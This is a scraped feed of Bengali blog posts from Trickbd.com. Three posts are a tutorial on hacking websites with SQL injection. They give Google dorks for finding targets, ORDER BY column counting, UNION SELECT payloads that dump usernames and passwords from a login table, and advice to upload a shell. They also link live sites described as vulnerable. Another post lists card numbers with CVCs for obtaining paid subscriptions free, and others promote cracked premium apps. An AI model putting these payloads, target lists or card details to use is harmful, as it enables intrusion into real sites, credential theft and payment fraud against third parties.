এক এক ক্ষেত্রে এক এক রকম হতে পারে টেবিল নেম। নিজের বুদ্ধি খাটান!
আমরা এখন login টেবিল থেকে ডাটা হ্যাক করবো ।
এখন আমরা group_concat(table_name) কে group_concat(column_name) এবং information_schema.tables কে information_schema.columns
দিয়ে রিপ্লেস করবো এবং table_schema এর জায়গায় table_name ব্যাবহার করবো।
এখন আমারা table_name কে একটি প্যারামিটার দিবো টেবল নেম টি quote এ নিয়ে আসবো
table_name=’login’
আমরা qoute কেনো ব্যাবহার করলাম??
কারণ এটার ডাটা টাইপ varchar…
অনেক সময় এই পদ্ধতি টি কাজ করে নাহ…
সে ক্ষেত্রে টেবিল নাম কে char এ রুপান্তর করতে হয়।
এটা করার জন্যে মোজিলা ফায়ার ফক্সে হ্যাকবার নামে একটি এডঅন আছে ওটা এড করে নিন।
সহজের char এ রুপান্তর করতে পারবেন।
আমি login table টাকে char এ রুপান্তর করার পর সেটা হলো
CHAR(108, 111, 103, 105, 110)
এখন আমরা কমান্ডটি ব্যাবহার কিভাবে করে সেটা দেখবো।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)–

এখন আমরা login টেবিলের কলাম গুলো দেখতে পাবে
আমি যা যা পেলাম।
id,username,password,email,date_added,lastlogin,sessionid,type,status
এখন আসল কাজ শুরু ।
এখন আমরা কলাম থেকে id এবং password হ্যাক করবো ।
এখন আমরা (username,0x3a,password) এই কমান্ডটি ব্যাবহার করবো
এবং login টেবিল থেকে এই দুইটি কলামের ডাটা বের করবো ।
যার জন্যে কমান্ড হবে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php ?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login–

এখন আপনি username এবং password দেখতে পাবেন।
এখন আপনার কাজ হবে এডমিন প্যানেল বের করে সাইটটা তে শেল আপলোড করে হ্যাক করে ফেলা 😀

যাতে বুঝতে সুবিধা হয়।
প্রায় পাঁচ ঘন্টা কষ্ট করে সম্পূর্ণ পোস্টটা লেখলাম।

The post Sql injection Bangla part 1 appeared first on Trickbd.com.


Friday, March 12, 2021

ফটো, ভিডিও এডিট করার জন্য Picsart Gold Subscription নিন ফ্রী তে ৭ দিনের জন্য

ফটো, ভিডিও এডিট করার জন্য Picsart Gold Subscription নিন ফ্রী তে ৭ দিনের জন্য

আজকে দেখাবো কিভাবে Picsart Gold👑 Subscription নিতে হয় ফ্রী তে, এই Subscription টা শুধু ৭দিন বা ৩০দিন এর জন্য নেওয়া যাবে। আপনি চাইলে পরে আবার একই ভাবে picsart gold Subscription নিতে পারবেন.

তো চলুন শুরু করি…….

প্রথমে একটি প্রিমিয়াম vpn – USA তে কানেক্ট করুন তারপর

picsart এর অয়েব সাইট এ চলে যান picsart তারপর Sing up এ ক্লিক করুন

নিচের মতো আসবেন… এখান থেকে sing up with email এ ক্লিক করুন

আপনার ইচ্ছামতো Mail, Username, Password দিয়ে ক্রিয়েট একাউন্ট এ ক্লিক করুন।

এমন আসলে যেকোন একটা সিলেক্ট করে কম্পিলিট এ ক্লিক করুন

নিচের মতো আসলে Start free trial এ ক্লিক করুন

💳CARD INFORMATION

১/ Card Number: 5221580023837241
Date: 01/25
Cvc: 232
Ip: USA

২/ Card Number: 5221580024766365
Date: 01/25
Cvc: 232
Ip: USA

৩/ Card Number: 5221580028686213
Date: 01/25
Cvc: 232
Ip: USA

Address:
Street- 30 Aulike St.
City- Kailua
State- Hawaii
Zip-code- 9673

এখানে কার্ড সিলেক্ট করুন, এবং উপরের যেকোন একটা কার্ড এর ইনফরমেশন বসিয়ে দিন, তারপর start free trial এ ক্লিক করুন

একাউন্ট করা সঠিক হয়ে এমন দেখতে পারবেন

দেখুন আমাদের ৭দিন এর জন্য প্রিমিয়াম একাউন্ট হয়ে গেছে, এবার আপনার picsart এপ্স এ গিয়ে একাউন্ট এর username, password দিয়ে লগিন করুন।

আপনি চাইলে ৭দিন পর একই ভাবে একাউন্ট খুলে সব প্রিমিয়াম ফিচার ব্যাবহার করতে পারবেন।

ধন্যবাদ সবাইকে। এই পোস্ট প্রথম আমার নিজের সাইট এই পাবলিশ করা হয়েছে। Trickusbd.com

আমাদের সাইট প্রতি পোস্ট এ ১০টাকা করে দেওয়া হয়।


The post ফটো, ভিডিও এডিট করার জন্য Picsart Gold Subscription নিন ফ্রী তে ৭ দিনের জন্য appeared first on Trickbd.com.


Delete হয়ে যাওয়া Important Message Recover করুন মিনিটের মধ্যে .

Delete হয়ে যাওয়া Important Message Recover করুন মিনিটের মধ্যে .










কেমন আছেন বন্ধুরা ..? আশা করি সবাই ভালো আছেন । আজকে আপনাদের সাথে একটি গুরুত্বপূর্ণ ট্রিক শেয়ার করতে যাচ্ছি টাইটেল দেখে হয়তো আপনারা বুঝে গিয়েছেন । শুরু করার আগেই বলে নেই কিছু ভুল হলে ক্ষমা করবেন এবং ভুল ধরিয়ে দেওয়ার চেষ্টা করবেন ।

আমাদের অনেকের ফোনে অনেক ধরনের গুরুত্বপূর্ণ মেসেজ থাকে । অনেক সময় ভুলবশত কারণে আমাদের ফোন থেকে গুরুত্বপূর্ণ মেসেজ ডিলিট হয়ে যায় , পরবর্তীতে মেসেজটি কে আমরা কোথাও খুঁজে পাইনা । এরকম ঘটনা আমাদের সাথে প্রায়ই হয়ে থাকে । ভাবুন তো যদি ম্যাসেজটি কে পুনরায় পুনরুদ্ধার বা Recover করা যায় তাহলে কেমন হবে..? অবশ্যই ভালো হবে । আপনাদের সাথে আজকে এই ট্রিকটাই শেয়ার করতে যাচ্ছি যে কিভাবে ” Delete হয়ে যাওয়া Message Recover করা যায় “।

তাহলে শুরু করা যাক ।

1. Message Recover করার জন্য প্রথমত আমাদের একটি অ্যাপস ডাউনলোড করে নিতে হবে । ডাউনলোড করার জন্য নিচে যান ।

APPS DETAILS :




Apps Name : Free Sms Recovery


App Size : 1.8 MB


App Version : 3.42


App Subscription : Premium

Apps Pro Features :


1. Unlimited Sms Recovery One Click


2.All Ads Removed





Download Message Recover



2 . দ্বিতীয়তঃ আমাদের প্রথমে অ্যাপস টি ওপেন করতে হবে এর পর Read SMS Permission চাইবে তা Allow করে দিতে হবে । ব্যাস অ্যাপস এর Setting করা শেষ । এখন আপনাদের দেখাবো কিভাবে মেসেজ পুনরুদ্ধার বা Recover করবেন ।



3. প্রথমে আমি আমার একটি Message Delete করলাম Proof দেখানোর জন্য ।


4. এখন আবার অ্যাপসটি ওপেন করি এসএমএস Recover করার জন্য তারপর ” Show deleted text message by threads ” এ ক্লিক করি এরপর Contact Permission চাইবে তা Allow করে দিতে হবে । এরপর আপনার Delete হয়ে যাওয়া মেসেজ টি শো করবে এখানে এরপর আপনার মেসেজটির সিলেক্ট আইকনে ক্লিক করুন আপনার নির্দিষ্ট মেসেজটি রিকভার করার জন্য । এরপর Recover Selected SMS এ ক্লিক করুন এরপর Change Default Sms App Permission চাইলে তা Ok করে দিন এরপর Change এ ক্লিক করুন এরপরও Write or Delete Permission চাইবে তা Allow করে দিন । ব্যাস আপনার মেসেজটি রিকভার হয়ে গেল । এখন আপনার মেসেজটি চেক করুন দেখুন রিকভার হয়ে গেছে ।
এভাবেই আপনি আপনার Delete হয়ে যাওয়া Message গুলো Recover করতে পারবেন ‌।

আজ এ পর্যন্তই ,যে কোন Premium Apps লাগলে বলতে পারেন দেওয়ার চেষ্টা করবো । এভাবেই ক্ষুদ্র ক্ষুদ্র জ্ঞান আপনাদের মাঝে তুলে ধরার চেস্টা করবো ।
ধন্যবাদ সবাইকে ।

The post Delete হয়ে যাওয়া Important Message Recover করুন মিনিটের মধ্যে . appeared first on Trickbd.com.


Monday, March 8, 2021

Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন [পার্ট ২]

Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন [পার্ট ২]

আগের পোস্ট আমরা শিখেছি কিভাবে সাইট এর দূর্বলতা চেক করতে হয়, এবং কোন সাইট গুলো তে sql injection করা যাবে।

আজ আমরা শিখবো কিভাবে সাইট এর কলাম সংখ্যা বের করতে হয়।

আমাদের টার্গেট সাইট ছিলো এটা
https://ift.tt/3r4XIkl

কলাম বের করতে হলে সাইট এর লিংক এর একদম শেষ এ
[এটা +ORDER+BY+1– ] অথবা
[এটা order by 1– ]
যেকোন একটা দিতে হয়।

তাহলে লিংক টা হবে
https://ift.tt/3r4XIkl

এখন থেকে +ORDER+BY+1– বসিয়ে লিংক হবেঃ
https://ift.tt/30kXJoG;

শেষ এ দেখতে পাচ্ছেন 1 দেওয়া আছে এটা দিয়েই কলাম বের করতে হবে।

ধরুন কোন সাইট এ যদি ১০ টা কলাম সংখ্যা থাকে তাহলে ১ এর জায়গায় ১০ বসাতে হবে।

তাহলে এমন হবেঃ +ORDER+BY+10–

আমাদের টার্গেট সাইট এটাঃ https://ift.tt/3r4XIkl

আমরা এই সাইট এর কলাম বের করবো তো লিংক এর শেষ এ +ORDER+BY+1– বসাবো

https://ift.tt/30kXJoG; এটা ব্রাউজার এ এন্টার করবো।

নোটঃ কোন সাইট এর কলাম সংখ্যা ১০ টি এখন যদি সাইট লিংক শেষ এ +ORDER+BY+5– বসান তাহলে সাইট এ কোন চেন্জ হবে না, কিন্তু যখন +ORDER+BY+11– বসাবেন তখন ই সাইট এ Error আসবে। আরো ভালো করে বল্লে ধরুন আমাদের টার্গেট সাইট এর কলাম ১২টি এখন আপনি কলাম সংখ্যা বের করার জন্য +ORDER+BY+1– দিয়ে রান করলেন তাহলে সাইট এর কোন চেন্জ হবে না কিন্তু যখন সাইট এর কলাম সংখ্যা থেকে আপনার দেওয়া +ORDER+BY+ এখান কার সংখ্য — টা বেশি হবে তখন এরর আসবে।

সাইট কলাম ১৫টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+16– দেন তাহলে এরর আসবে.

সাইট কলাম ১০টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+11– দেন তাহলে এরর আসবে.

সাইট কলাম 5 টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+6– দেন তাহলে এরর আসবে.

মানে সাইট এর কলাম সংখ্যা থেকে আপনার দেওয়া আর্ডার এর সংখ্যা বেশি হলে এরর আসবে, কিন্তু সাইট এর কলাম সংখ্যা আপনার দেওয়া আর্ডার এর সংখ্যার চেয়ে কম হয় তাহলে এরর দেখাবে না।

উদাহরণঃ
সাইট কলাম ১৫টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+14– দেন তাহলে এরর আসবে না.

সাইট কলাম ১০টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+5– দেন তাহলে এরর আসবে না।

সাইট কলাম 5 টি আপনি যদি লিংক এর শেষ এ +ORDER+BY+1– দেন তাহলে এরর আসবে না।

তারমানে আপনাকে সঠিক কলাম খুজে বের করতে হবে,

আমাদের টার্গেট সাইট টাঃ
https://ift.tt/3qqOtdh; দিয়ে দেখলাম কোন এরর নেই, 7 এর কম দিয়েও দেখেছি এরর নেই

কিন্তু

https://ift.tt/2O5loqU; দিয়ে দেখলাম এরর আছে, 8 এর বেশি দিয়ে দেখেছি এরর আছে

তারমানে কলাম আছে 7টি আমরা কলাম বের করতে সক্ষম হয়েছি।

আজ এই পযন্তই থাক পরবর্তী পোস্টে দেখবো কিভাবে সাইট এর কোন কলাম vulnerable সেটি চেক করতে হয়

আমাদের সবমিলিয়ে পোস্ট হবে ৫টা, ৫টা পোস্টে আমরা sql injection শিখে ফেলবো🥰🥰

পোস্ট ভালো লাগলে

আমাদের সাইট টা ডিজিট করবেনঃ Trickusbd

The post Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন [পার্ট ২] appeared first on Trickbd.com.


যে কোনো White Color ছবিকে HD Coloring ছবিতে পরিনত করুন Colorize Premium App এর মাধ্যমে…

যে কোনো White Color ছবিকে HD Coloring ছবিতে পরিনত করুন Colorize Premium App এর মাধ্যমে…









কেমন আছেন বন্ধুরা ..? আশা করি সবাই ভালো আছেন । আজকে আপনাদের সাথে একটি ট্রিক শেয়ার করতেছি টাইটেল দেখে হয়তো বুঝে গিয়েছেন । শুরু করার আগেই বলে নেই কিছু ভুল হলে ক্ষমা করবেন এবং ভুল ধরিয়ে দেওয়ার চেষ্টা করবেন ।

আমাদের অনেকেরই অনেক সাদা কালো ছবি আছে , সাদা কালো ছবি ততো ভালো দেখায় না , ভাবুন তো সাদা কালো ছবি যদি Android ফোনের মাধ্যমে নিখুঁত ভাবে Coloring করা যায় তাহলে কেমন দেখায় । অবশ্যই ভালো দেখাবে । আর আমরা অনেকেই অনেক ধরনের App ব্যবহার করে থাকি ছবি Coloring জন্য কিন্তু ঐ এপ গুলোতে ভালো মানের Coloring হয় না । তাই আপনাদের জন্য একটি জনপ্রিয় App নিয়ে এসেছি , যেখান থেকে আপনারা এক ক্লিকেই White Photo Coloring করতে পারবেন

তাহলে শুরু করা যাক ।

১ . Coloring করার জন্য আমাদের Colorize Premium Version Apps টির প্রয়োজন পরবে । Premium App টি ডাউনলোড করার জন্য নিচে যান ।




APPS DETAILS :


Apps Name : Colorize – Color to old photo


App Size : 66.8 Mb


Released on : 27 Dec 2020


Apps Subscription: Premium

Apps Pro Features :

1. Unlimited photo colorization

2. Unlimited saving of colorized photos

3. Unlimited sharing of colorized photos

4. Photo backup and access from multiple devices

5. All Ads Removed



Download Pro Apps Free




২ . Coloring করার জন্য প্রথমে App টি Open করুন তারপর Scan Or Upload a photo এ ক্লিক করুন তারপর কিছু Permission চাইবে তা Allowed করে দিন আপনার সাদা কালো ছবিটি খুঁজে নিন , এবং আপনার কাঙ্খিত ছবিটিতে ক্লিক করুন এবার অটোমেটিক Coloring হতে শুরু করবে এরপর কয়েক মিনিট অপেক্ষা করুন Coloring হওয়া পর্যন্ত এরপর Done এ ক্লিক করুন আপনার ছবিটি Save হয়ে যাবে । ছবিটি আপনার Storage এ নেওয়ার জন্য আপনার Coloring ছবিটিতে ক্লিক করুন তারপর Three Dot Menu তে ক্লিক করুন তারপর Share This Photo এ ক্লিক করুন তারপর Save এ ক্লিক করুন Storage Permission চাইলে তা Allowed করে দিন ব্যস আপনার কাজ শেষ এখন আপনার ছবিটি আপনার মেমরিতে Save হয়ে গেছে ।

আজ এ পর্যন্তই ,যে কোন Premium Apps লাগলে বলতে পারেন দেওয়ার চেষ্টা করবো । ক্ষুদ্র ক্ষুদ্র জ্ঞান আপনাদের মাঝে তুলে ধরার চেস্টা করবো ।
ধন্যবাদ সবাইকে ।

The post যে কোনো White Color ছবিকে HD Coloring ছবিতে পরিনত করুন Colorize Premium App এর মাধ্যমে… appeared first on Trickbd.com.


Monday, March 1, 2021

Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন

Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন

সাইট ভানেবল চেক পার্ট ০১
আজকে কথা বলবো অয়েবসাইট হ্যাকিং নিয়ে, সাইট হ্যাক করার অনেক মেথড রয়েছে তার মধ্যে SQL Injection, Xss এগুলো বহুল জনপ্রিয়, আজকে আমরা SQL Injection দিয়ে সাইট হ্যাক করা শিখবো।

নোটিশঃ প্রথম তো সব সাইট হ্যাক করা যায় না, যেই সাইট গুলো তে বাগ পাওয়া যায় সেই গুলোই হ্যাক হয়। যেমনঃ ধরুন আপনি একটা সাইট তৈরি করলেন কিন্তু আপনি প্রোগ্রামিং তেমন ভালো জানেন না, সাইট তৈরি করার সময় প্রোগ্রামিং এ বিন্দু মাএ ভুল হয়ে গেলো কিন্তু আপনি সেটা খেয়াল করলেন না, তখন হ্যাকার রা ওই ভুল কে ধরে ধরে আপনার সাইট এর এডমিন পাসওয়ার্ড পযন্ত বের করে নেয়।

এখন আপনি কয়টা সাইট খুজে খুজে বের করবেন যেগুলো তে বাগ আছে, এভাবে সম্ভব না তাই না। এর জন্যও আমাদের গুগল রয়েছে।

আপনি গুগল এ নিচের ডর্ক গুলো দিয়ে সার্চ করুন, দেখবেন হাজার,হাজার সাইট আসবে এগুলোর বেশির ভাগই ভানেবল।

inurl: news.php id=
inurl: school.php id=
inurl: gov.php id=
inurl: game.php?id=

এছাড়াও আমি নিজেও ডর্ক বানাতে পারবেন, গুগল এ sql injection dork লিখে সার্চ করলে হাজার, হাজার ডর্ক পাবেন।

এবার আসি কিভাবে চেক করবেন সাইট ভানেবল কিনা, ভানেবল সাইট পেলেই আমরা ওই সাইট এ ইনজেকশন করতে পারবো।
ধরুন আপনি একটা সাইট খুজে পেলেন,
আমি এই সাইট নিলাম
https://ift.tt/3r4XIkl

এবার সাইট এর লিংক এর একদম শেষে ” বা ‘ এই চিহ্ন দিবেন তাহলে সাইট লিংক টা দেখতে নিচের মতো হবে

https://ift.tt/3b2crqF;

এই ‘ বা ” চিহ্ন দিয়ে ব্রাউজার এ এন্টার করার পর দেখবেন সাইট এ কিছু পরিবর্তন আসবে যেমন কোন লেখা বা ছবি মিসিং হয়ে যাবে অথবা লেখা থকবে sql error এমন হয়ে বুঝবেন সাইট টা ভানেবল,
নিচে ছবিতে দেখতে পাচ্ছেন কিছু মিসিং হয়ে গেছে,

আর যদি এমন কোন কিছুই না হয় তাহলে ওই সাইট ভানেবল না, তাহলে অন্য কোন সাইট খুজবেন।

তো আমাদের
https://ift.tt/3uEKJbn;

এই সাইট টায় কিছু পরিবর্তন এসেছে তার মানে এই সাইট টা ভানেবল,

আপনাদের সুবিধার জন্য আমি কিছু ভানেবল সাইট লিংক দিচ্ছি আপনারা দেখে নিবেন এবং প্রচুর ট্রাই করতে থাকবেন।
কিছু ভানেবল সাইট লিংকঃ

১/
https://ift.tt/3r4XIkl
২/
https://ift.tt/3uH8hwp
৩/ https://ift.tt/3pYyK4Y

আজকে এই পযন্তই থাক কারন sql injection খুব একটা সহজ নয় আবার কঠিন ও নয়।
পরবর্তী পোস্টে আমরা দেখবো কিভাবে সাইট এ কয়টা কলাম আছে সেটা বের করতে হয় এবং সেখান থেকে ভানেবল কলাম খুজে বের করতে হয়।

ইনশাআল্লাহ আমরা একদম লাস্ট পযন্ত যাবো এভাবে বাকি দের মতো মাঝ পথে ছেড়ে দিবো না।

পোস্ট টা সম্পুর্ন নিজের লেখা কেউ কপি করলে অবশ্যই ক্রেডিট দিতে ভুলবেন না।
©linux3bx5
ধন্যবাদ সবাই কে

The post Sql Injection এর মাধ্যমে ওয়েবসাইট হ্যাক করুন appeared first on Trickbd.com.